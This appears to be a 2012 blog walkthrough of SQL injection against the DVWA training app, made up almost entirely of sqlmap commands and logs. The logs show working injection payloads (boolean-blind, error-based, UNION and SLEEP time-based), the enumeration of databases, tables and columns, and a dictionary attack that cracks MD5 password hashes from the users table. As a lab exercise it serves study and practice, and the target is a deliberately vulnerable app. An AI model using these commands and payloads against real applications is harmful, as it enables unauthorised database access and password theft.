!!!: SQL Injection & SQL Bind DVWA

basically sql injection and blind sql injection, while the difference is:
Sql injection showing erorr message while sql injection blind does not display a message eroor

sqlmap first open, and enter the code for the scan

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" --string="Surname" --dbs

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 00:38:58

[00:38:58] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[00:38:58] [INFO] testing connection to the target url

[00:38:59] [INFO] testing if the provided string is within the target URL page content

[00:38:59] [INFO] testing if GET parameter 'id' is dynamic

[00:38:59] [INFO] confirming that GET parameter 'id' is dynamic

[00:38:59] [INFO] GET parameter 'id' is dynamic

[00:38:59] [INFO] heuristics detected web page charset 'ascii'

[00:38:59] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)

[00:38:59] [INFO] testing sql injection on GET parameter 'id'

[00:38:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[00:38:59] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable

[00:38:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[00:38:59] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable

[00:38:59] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[00:38:59] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[00:39:09] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable

[00:39:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[00:39:09] [INFO] target url appears to be UNION injectable with 2 columns

[00:39:10] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable

GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y

[00:39:11] [INFO] testing if GET parameter 'Submit' is dynamic

[00:39:11] [WARNING] GET parameter 'Submit' appears to be not dynamic

[00:39:11] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable

[00:39:11] [INFO] testing sql injection on GET parameter 'Submit'

[00:39:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[00:39:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[00:39:12] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[00:39:12] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y

[00:39:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[00:39:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[00:39:15] [WARNING] GET parameter 'Submit' is not injectable

sqlmap identified the following injection points with a total of 133 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit

---

[00:39:15] [INFO] manual usage of GET payloads requires url encoding

[00:39:15] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

[00:39:15] [INFO] fetching database names

available databases [4]:

[*] dvwa

[*] fbip

[*] information_schema

[*] mysql

[00:39:15] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 00:39:15

Scan DataBase in folder DVWA

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa --tables

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 00:42:45

[00:42:45] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[00:42:45] [INFO] resuming injection data from session file

[00:42:45] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[00:42:45] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit

---

[00:42:45] [INFO] manual usage of GET payloads requires url encoding

[00:42:45] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

[00:42:45] [INFO] fetching tables for database: dvwa

Database: dvwa

[2 tables]

+-----------+

| guestbook |

| users |

+-----------+

[00:42:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 00:42:45

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 00:44:34

[00:44:35] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[00:44:35] [INFO] resuming injection data from session file

[00:44:35] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[00:44:35] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit

---

[00:44:35] [INFO] manual usage of GET payloads requires url encoding

[00:44:35] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

[00:44:35] [INFO] fetching columns for table 'users' on database 'dvwa'

Database: dvwa

Table: users

[6 columns]

+------------+-------------+

| Column | Type |

+------------+-------------+

| avatar | varchar(70) |

| first_name | varchar(15) |

| last_name | varchar(15) |

| password | varchar(32) |

| user | varchar(15) |

| user_id | int(6) |

+------------+-------------+

[00:44:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 00:44:35

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 00:49:52

[00:49:52] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[00:49:52] [INFO] resuming injection data from session file

[00:49:52] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[00:49:52] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit

---

[00:49:52] [INFO] manual usage of GET payloads requires url encoding

[00:49:52] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y

[00:49:54] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'

[00:49:54] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'

recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y

[00:49:56] [INFO] using hash method: 'md5_generic_passwd'

what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]

[00:49:58] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'

do you want to use common password suffixes? (slow!) [y/N] y

[00:50:00] [INFO] starting dictionary attack (md5_generic_passwd)

[00:50:00] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'

[00:50:01] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'

[00:50:01] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'

[00:50:02] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'

Database: dvwa

Table: users

[4 entries]

+---------------------------------------------+

| password |

+---------------------------------------------+

| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |

| 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |

| e99a18c428cb38d5f260853678922e03 (abc123) |

| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |

+---------------------------------------------+

[00:50:02] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'

[00:50:02] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

!!!

Wednesday, February 1, 2012

SQL Injection & SQL Bind DVWA

No comments:

Post a Comment

About Me

Blog Archive